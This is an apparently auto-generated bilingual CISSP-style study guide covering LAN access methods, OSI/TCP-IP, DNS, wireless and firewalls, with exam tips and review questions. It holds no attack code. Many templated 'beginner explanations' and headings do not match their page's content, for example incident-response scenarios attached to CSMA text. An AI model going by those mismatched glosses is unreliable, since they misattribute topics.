你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 825 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 108 / PDF P826

第 826 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

1. The host listens to the LAN media to determine whether it is in use. 2. If the LAN media is not being used, the host transmits its communication. 3. While transmitting, the host listens for collisions (in other words, two or more hosts transmitting simultaneously). 4. If a collision is detected, the host transmits a jam signal. 5. If a jam signal is received, all hosts stop transmitting. Each host waits a random period of time and then starts over at step 1. Ethernet networks employ the CSMA/CD technology. CSMA/CD responds to collisions by having each member of the collision domain wait for a short but random period of time before starting the process over.

Unfortunately, allowing collisions to occur and then responding or reacting to collisions causes delays in transmissions as well as a required repetition of transmissions. This results in about 40 percent loss in potential throughput. Carrier-Sense Multiple Access with Collision Avoidance (CSMA/CA) This is a contention-based LAN media access technology that performs communications using the following steps: 1. The host has two connections to the LAN media: inbound and outbound. The host listens on the inbound connection to determine whether the LAN media is in use. 2. If the LAN media is not being used, the host requests permission to transmit. 3.

If permission is not granted after a timeout period, the host starts over at step 1. 4. If permission is granted, the host transmits its communication over the outbound connection. 5. The host waits for an acknowledgment. 6. If no acknowledgment is received after a time-out period, the host starts over at step 1. 802.11 wireless networking is an example of a network that employs CSMA/CA technologies. CSMA/CA attempts to avoid collisions by granting only a single permission to communicate at any given time. This system 1.

中文直译 / 整理

主机侦听局域网媒体,以确定其是否正在使用中。 2. 如果局域网媒体未被使用,主机将发送其通信数据。 3. 在发送过程中,主机侦听冲突(即两个或多个主机同时发送)。 4. 如果检测到冲突,主机会发送阻塞信号。 5. 如果接收到阻塞信号,所有主机都将停止发送。 每台主机等待一个随机时间 段后,重新从步骤1开始。 以太网网络采用CSMA/CD技术。 当发生冲突时,CSMA/CD会让冲突域中的 每个成员等待一个短暂但随机的时间段,然后再重新开始该过程。 然而,允许 冲突发生并随后做出响应或处理冲突,会导致传输延迟以及传输的重复,从而 导致约40%的潜在吞吐量损失。 载波侦听多路访问/冲突避免(CSMA/CA)这是一种基于竞争的局域网媒体访 问技术,其通信过程遵循以下步骤: 1. 主机有两个连接到局域网介质的连接:入站和出站。 主机通过监听入站连 接来确定局域网介质是否正在使用中。 2. 如果局域网介质未被使用,主机请求传输权限。 3. 如果在超时后仍未获得许可,主机将从步骤1重新开始。 4. 如果获得许可,主机通过出站连接发送其通信数据。 5. 主机等待确认信息。 6. 如果在超时后仍未收到确认信息,主机将从步骤1重新开始。

802.11无线网络是采用CSMA/CA技术的网络示例。 CSMA/CA通过在任何 给定时间仅授予单次通信权限来尝试避免冲突。 该系统

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 826 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 109 / PDF P827

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

requires the designation of a primary system, which responds to the requests and grants permission to send data transmissions. Token Passing This is an arbitration LAN media access technology that performs communications using a digital token. Possession of the token allows a host to transmit data. Once its transmission is complete, it releases the token to the next system. Token passing was used by ring topology–based networks, such as legacy Token Ring and Fiber Distributed Data Interface (FDDI). Token passing prevents collisions since only the system possessing the token is allowed to transmit data.

Polling This is an arbitration LAN media access technology that performs communications using a primary-secondary configuration. One system is labeled as the primary system. All other systems are labeled as secondary. The primary system polls or inquires of each secondary system in turn whether they have a need to transmit data. If a secondary system indicates a need, it is granted permission to transmit. Once its transmission is complete, the primary system moves on to poll the next secondary system. Mainframes often supported polling. Polling addresses collisions by attempting to prevent them from using a permission system. Polling is an inverse of the CSMA/CA method.

Both use primary and secondary systems, but although CSMA/CA allows the secondary system to request permissions, polling has the primary system offer permission. Polling can be configured to grant one system (or more) priority over other systems. For example, if the standard polling pattern was 1, 2, 3, 4, then to give system 1 priority, the polling pattern could be changed to 1, 2, 1, 3, 1, 4. Summary The tasks of designing, deploying, and maintaining security on a network require intimate knowledge of the technologies involved in networking. This includes protocols, services, communication mechanisms, topologies, cabling, endpoints, and networking devices.

The OSI model is a standard against which all protocols are evaluated. Understanding how the OSI model is used and how it applies to real-world protocols can help system designers and system administrators improve security. The TCP/IP model is derived directly from the TCP/IP protocol suite and roughly maps to the OSI model.

中文直译 / 整理

需要指定一个主系统,该系统响应请求并授予发送数据传输的权限。 令牌传递 这是一种仲裁局域网媒体访问技术,通过数字令牌执行通信。 拥有令 牌的主机可以传输数据。 一旦传输完成,它会将令牌释放给下一个系统。 令牌 传递被用于基于环形拓扑的网络,例如传统的令牌环网和光纤分布式数据接口 (FDDI)。 由于只有拥有令牌的系统被允许传输数据,因此令牌传递可防止冲 突。 轮询 这是一种仲裁局域网媒体访问技术,采用主从配置执行通信。 其中一个系 统被标记为主系统,所有其他系统被标记为从系统。 主系统依次轮询每个从系 统,询问它们是否有传输数据的需求。 如果从系统表明有需求,则被授予传输 权限。 一旦传输完成,主系统继续轮询下一个从系统。 大型机通常支持轮询。 轮询通过使用权限系统来避免冲突。 轮询是CSMA/CA方法的逆向形式。 两者 都使用主从系统,但尽管CSMA/CA允许从系统请求权限,轮询则是由主系统 主动授予权限。 轮询可以配置为给予一个系统(或多个系统)优先于其他系统 的权限。 例如,如果标准轮询顺序为1、2、3、4,则为了给予系统1优先权,轮 询顺序可更改为1、2、1、3、1、4。

摘要 设计、部署和维护网络安全性需要对网络技术有深入的了解。 这包括协议、服 务、通信机制、拓扑结构、布线、端点和网络设备。 OSI模型是评估所有协议的标准。 理解OSI模型的使用方式及其在实际协议中的 应用,有助于系统设计人员和系统管理员提升安全性。 TCP/IP模型直接源自 TCP/IP协议套件,并与OSI模型大致对应。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 110 / PDF P828

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Most networks employ TCP/IP as the primary protocol. IP networking includes IPv4 and IPv6. IPv4 is the version of Internet Protocol that is most widely used around the world. IPv6 is being rapidly adopted for both private and public network use. DNS and ARP were developed to interchange or resolve between domain names and IP addresses or IP addresses and MAC addresses, respectively. TCP/IP supports many secure protocols, including IPSec, SSH, and protocols encrypted by TLS. TCP/IP is a multilayer protocol suite that allows for flexibility, resiliency, and encryption. Converged protocols are common on modern networks, including VoIP and iSCSI.

SDN and CDN have expanded the definition of network as well as expanded the use cases for it. Micro-segmentation divides an internal network into numerous subzones to allow for greater security and control of communications, which in turn supports a zero-trust security policy. Wireless communications occur in many forms, including cell phone, Bluetooth (802.15.1 and Bluetooth SIG), RFID, NFC, and Wi-Fi networking (802.11). Wireless communication is more vulnerable to interference, eavesdropping, denial of service, and AitM attacks. Routers, hubs, switches, repeaters, gateways, proxies, NAC, and firewalls are an important part of a network's security.

Firewalls are essential tools in managing, controlling, and filtering network traffic. Endpoint security is the concept that each individual device must maintain local security whether or not its network or telecommunications channels also provide security. A wide range of hardware components can be used to construct a network, not the least of which is the cabling used to tie all the devices together. Understanding the strengths and weaknesses of each transmission media type is part of designing a secure network. Study Essentials Know the OSI model layers. The OSI layers are as follows: Application, Presentation, Session, Transport, Network, Data Link, and Physical.

Know the network container names. The network containers are: OSI layers 7–5 protocol data unit (PDU), Layer 4 segment (TCP) or a datagram (UDP), Layer 3 packet, Layer 2 frame, and Layer 1 bits.

中文直译 / 整理

大多数网络将TCP/IP作为主要协议。 IP网络包括IPv4和IPv6。 IPv4是全球 最广泛使用的互联网协议版本。 IPv6正在被快速应用于私有和公共网络。 DNS和ARP分别用于在域名与IP地址、IP地址与MAC地址之间进行转换或解 析。 TCP/IP支持多种安全协议,包括IPSec、SSH和由TLS加密的协议。 TCP/IP是一个多层协议套件,具有灵活性、弹性和加密能力。 收敛协议在现代网络中很常见,包括 VoIP 和 iSCSI。 SDN 和 CDN 不仅扩 展了网络的定义,还扩展了其使用场景。 微分段将内部网络划分为多个子区域,以实现对通信的更高安全性和控制,从 而支持零信任安全策略。 无线通信有多种形式,包括手机、蓝牙(802.15.1 和 Bluetooth SIG)、 RFID、NFC 和 Wi‑Fi 网络(802.11)。 无线通信更容易受到干扰、窃听、 拒绝服务和中间人攻击的影响。 路由器、集线器、交换机、中继器、网关、代理、NAC 和防火墙是网络安全 性的重要组成部分。 防火墙是管理、控制和过滤网络流量的关键工具。

端点安 全的概念是,每个独立设备都必须维护本地安全性,无论其网络或电信通道是 否提供安全保护。 可以使用多种硬件组件构建网络,其中最重要的是用于连接所有设备的电缆。 了解每种传输介质的优缺点是设计安全网络的一部分。 学习必备 了解OSI模型的层次。 OSI层次如下:应用层、表示层、会话层、传输层、网络层、 数据链路层和物理层。 了解网络容器名称。 网络容器包括:OSI第7至5层的协议数据单元(PDU)、第 4层的段(TCP)或数据报(UDP)、第3层的数据包、第2层的帧和第1层的比特。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

网络题先定位层次,再判断协议、设备或攻击位置。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 111 / PDF P829

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Understand the MAC address. Media Access Control (MAC) address is a 6-byte (48-bit) binary address written in hexadecimal notation, aka hardware address, physical address, the NIC address, and the Ethernet address. The first 3 bytes (24 bits) of the address is the organizationally unique identifier (OUI), which denotes the vendor or manufacturer. Understand the TCP/IP model. Also known as DARPA or the DOD model, the model has four layers: Application (also known as Process), Transport (also known as Host-to-Host), Internet (sometimes known as Internetworking), and Link (although the terms Network Interface and sometimes Network Access are used). Understand DNS.

The Domain Name System (DNS) is the hierarchical naming scheme used in both public and private networks. DNS links humanfriendly fully qualified domain names (FQDNs) and IP addresses together. DNSSEC and DoH are DNS security features. Understand DNS poisoning. DNS poisoning is the act of falsifying the DNS information used by a client to reach a desired system. It can be accomplished through a rogue DNS server, pharming, altering a hosts file, corrupting IP configuration, DNS query spoofing, and proxy falsification. Know about ARP. Address Resolution Protocol (ARP) is essential to the interoperability of logical and physical addressing schemes.

ARP is used to resolve IP addresses into MAC addresses. Also, know about ARP poisoning. Know about micro-segmentation. Micro-segmentation is dividing up an internal network into numerous subzones, potentially as small as a single device, such as a high-value server or even a client or endpoint device. Each zone is separated from the others by internal segmentation firewalls (ISFWs), subnets, or VLANs. Know about edge networks. An edge network is a carefully designed data architecture that strategically allocates computing resources to edge devices within a network.

This design helps distribute processing power demands away from central servers, empowering the devices to handle a significant portion of the processing workload. Understand the various wireless technologies. Cell phones, Bluetooth (802.15.1 and Bluetooth SIG), and Wi-Fi wireless networking (802.11) are all called wireless technologies, even though they are all different. Be aware of their differences, strengths, and weaknesses.

中文直译 / 整理

理解MAC地址。 介质访问控制(MAC)地址是一个6字节(48位)的二进制 地址,以十六进制表示,也称为硬件地址、物理地址、网卡地址和以太网地址。 该地址的前3字节(24位)是组织唯一标识符(OUI),用于标识供应商或制 造商。 理解TCP/IP模型。 该模型也称为DARPA模型或DOD模型,包含四层:应 用层(也称为进程层)、传输层(也称为主机到主机层)、互联网层(有 时称为互连网络层)和链路层(尽管术语网络接口层和有时网络访问层也 被使用)。 理解DNS。 域名系统(DNS)是公共和私有网络中使用的分层命名方案。 DNS将人类友好的完全合格域名(FQDN)与IP地址关联起来。 DNSSEC和 DoH是DNS的安全特性。 理解DNS欺骗。 DNS欺骗是指伪造客户端用于访问目标系统的DNS信息的行 为。 它可以通过恶意DNS服务器、域名欺骗、修改hosts文件、破坏IP配置、 DNS查询欺骗和代理伪造来实现。 了解ARP。 地址解析协议(ARP)对于逻辑地址和物理地址方案的互操作性 至关重要。 ARP用于将IP地址解析为MAC地址。 同时,也要了解ARP欺骗。 了解微分段。

微分段是将内部网络划分为多个子区域,这些子区域可能小至单个 设备,例如高价值服务器,甚至客户端或终端设备。 每个区域都通过内部分段防 火墙(ISFW)、子网或VLAN与其他区域隔离。 了解边缘网络。 边缘网络是一种精心设计的数据架构,它在网络内的边缘设 备中战略性地分配计算资源。 这种设计有助于将处理负载从中央服务器分散 开来,使设备能够承担大部分处理工作。 了解各种无线技术。 手机、蓝牙(802.15.1 和 Bluetooth SIG)以及 Wi‑Fi 无线网络(802.11)都被称作无线技术,尽管它们各不相同。 请了 解它们的差异、优势和劣势。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

ISO 偏标准和管理体系。

考试常让你把协议、端口、层次对应起来。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 112 / PDF P830

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Understand the basics of securing 802.11 networking. Know about RFID, NFC, satellite, narrow-band, and Zigbee. Understand site surveys. A site survey is a formal assessment of wireless signal strength, quality, and interference using an RF signal detector. A site survey is performed by placing a wireless base station in a desired location and then collecting signal measurements from throughout the area. Understand WPS attacks. Wi-Fi Protected Setup (WPS) is intended to simplify the effort involved in adding new clients to a secured wireless network. It operates by automatically connecting the first new wireless client to seek the network once WPS is triggered. Understand captive portals.

A captive portal is an authentication technique that redirects a newly connected client to a web-based portal access control page. Know wireless attacks. Attacks include war driving, wireless scanners/crackers, rogue access points, evil twin, disassociation, jamming, IV abuse, and replay. Be familiar with CDNs. A content distribution network (CDN), or content delivery network, is a collection of resource services deployed in numerous data centers across the Internet to provide low latency, high performance, and high availability of the hosted content. Understand NAC.

Network access control (NAC) is the concept of controlling access to an environment through strict adherence to and enforcement of security policy. Know about 802.1X, preadmission, postadmission, agent-based, and agentless. Understand the various types of firewalls. There are several types of firewalls: static packet filtering, application-level, circuit-level, stateful inspection, NGFW, and ISFW. Also, know about virtual firewall, filters/rules/ACLs/tuples, bastion host, ingress, egress, RTBH, stateless versus stateful, WAF, SWG, TCP wrapper, DPI, and content and URL filtering. Know about proxies. A proxy server is used to mediate between clients and servers.

Proxies are most often used in the context of providing clients on a private network with internet access while protecting the identity of the clients. Know about forward, reverse, transparent, and nontransparent. Understand endpoint security. Endpoint security is the concept that each individual device must maintain local security whether or not its

中文直译 / 整理

了解 802.11 网络安全的基础知识。 了解 RFID、NFC、卫星、窄带和 Zigbee。 了解站点勘测。 站点勘测是使用RF信号检测器对无线信号强度、质量和干扰进行 的正式评估。 站点勘测通过将无线基站放置在目标位置,然后从整个区域收集信 号测量数据来执行。 了解WPS攻击。 Wi‑Fi保护设置(WPS)旨在简化将新客户端添加到安全无线 网络的过程。 其工作方式是:一旦触发WPS,自动连接第一个请求网络的无线 客户端。 了解强制门户。 强制门户是一种身份验证技术,它将新连接的客户端重定向到基 于Web的门户访问控制页面。 熟悉无线攻击。 攻击包括战争驾驶、无线扫描器/破解器、 rogue 接入点、邪恶 双胞胎、去关联、干扰、IV滥用和重放。 熟悉CDN。 内容分发网络(CDN),或内容交付网络,是在互联网上多 个数据中心部署的一组资源服务,旨在提供低延迟、高性能和高可用性的 托管内容。 理解NAC。 网络访问控制(NAC)是指通过严格遵守和执行安全策略来 控制对环境的访问。 了解802.1X、准入前、准入后、基于代理和无代理 机制。 了解各种类型的防火墙。

防火墙有多种类型:静态包过滤、应用层、电路层、 状态检测、NGFW和ISFW。 此外,还需了解虚拟防火墙、过滤器/规则/ ACL/元组、堡垒主机、入站、出站、RTBH、无状态与有状态、WAF、S WG、TCP包装器、DPI以及内容和URL过滤。 了解代理。 代理服务器用于在客户端与服务器之间进行中介。 代理通常用于为私 有网络中的客户端提供互联网访问,同时保护客户端的身份。 了解正向代理、反 向代理、透明代理和非透明代理。 了解端点安全。 端点安全是指每个独立设备都必须维护本地安全,无论其

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
学习单元 113 / PDF P831

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

network or telecommunications channels also provide security. Endpoint detection and response (EDR) is a combination of firewall, intrusion detection system (IDS), and antimalware. Managed detection and response (MDR) combines EDR with Security information and event management (SIEM), network traffic analysis (NTA), and network IDS. Endpoint protection platform (EPP) is an intrusion prevention system (IPS) variant of EDR. Extended detection and response (XDR) is the combination of EDR, MDR, and EPP often with cloud-based remote monitoring and analysis. Be familiar with the common LAN technologies. The most common LAN technology is Ethernet.

Also, be familiar with analog versus digital communications; synchronous versus asynchronous communications; duplexing; baseband versus broadband communications; broadcast, multicast, unicast, anycast, and geocast communications; CSMA, CSMA/CD, and CSMA/CA; token passing; and polling. Written Lab 1. Name the layers of the OSI model and their numbers from top to bottom. 2. Name three problems with cabling and the methods to counteract those issues. 3. What are the various technologies employed by wireless devices to maximize their use of the available radio frequencies? 4. Discuss methods used to secure 802.11 wireless networking. 5.

Name eight Application-Layer protocols and their ports (indicate whether the ports are TCP or UDP). Review Questions 1. Dorothy is using a network sniffer to evaluate network connections. She focuses on the initialization of a TCP session. What is the first phase of the TCP three-way handshake sequence? A. SYN flagged packet B. ACK flagged packet C. FIN flagged packet

中文直译 / 整理

网络或电信通道是否也提供安全保护。 端点检测与响应(EDR)是防火墙、 入侵检测系统(IDS)和反恶意软件的组合。 托管检测与响应(MDR)将 EDR与安全信息和事件管理(SIEM)、网络流量分析(NTA)和网络IDS相 结合。 端点保护平台(EPP)是EDR的一种入侵防御系统(IPS)变体。 扩展 检测与响应(XDR)是EDR、MDR和EPP的组合,通常还包括基于云的远程 监控和分析。 熟悉常见的局域网技术。 最常见的局域网技术是以太网。 同时,熟悉模拟通信 与数字通信; 同步通信与异步通信; 全双工通信; 基带通信与宽带通信; 广播、 组播、单播、任播和地理广播通信; CSMA、CSMA/CD 和 CSMA/CA; 令牌 传递; 以及轮询。 书面实验 1. 按从上到下的顺序列出 OSI 模型的各层及其编号。 2. 列出三种布线问题及应对这些问题的方法。 3. 无线设备采用哪些技术来最大化利用可用的无线电频率? 4. 讨论用于保护 802.11 无线网络的方法。 5. 列出八种应用层协议及其端口(注明端口是TCP还是UDP)。 复习题 1. 多萝西正在使用网络嗅探器评估网络连接。 她重点关注TCP会话的初始化 过程。

TCP三次握手序列的第一阶段是什么? A. SYN标志的数据包 B. ACK标志的数据包 C. FIN标志的数据包

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 114 / PDF P832

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

D. SYN/ACK flagged packet 2. UDP is a connectionless protocol that operates at the Transport Layer of the OSI model and uses ports to manage simultaneous connections. Which of the following terms is also related to UDP? A. Bits B. Logical addressing C. Data reformatting D. Simplex 3. Which of the following is a means for IPv6 and IPv4 to be able to coexist on the same network? (Choose all that apply.) A. Dual stack B. Tunneling C. IPSec D. NAT-PT E. IP sideloading 4. Security configuration guidelines issued by your CISO require that all HTTP communications be secure when communicating with internal web services. Which of the following is true in regards to using TLS?

(Choose all that apply.) A. Allows for use of TCP port 443 B. Prevents tampering, spoofing, and eavesdropping C. Requires two-way authentication D. Is backward compatible with SSL sessions E. Can be used as a VPN solution 5. Your network supports TCP/IP. TCP/IP is a multilayer protocol. It is primarily based on IPv4, but the organization is planning on deploying IPv6 within the next year. What is both a benefit and a potentially harmful implication of multilayer protocols? A. Throughput B. Encapsulation D.

中文直译 / 整理

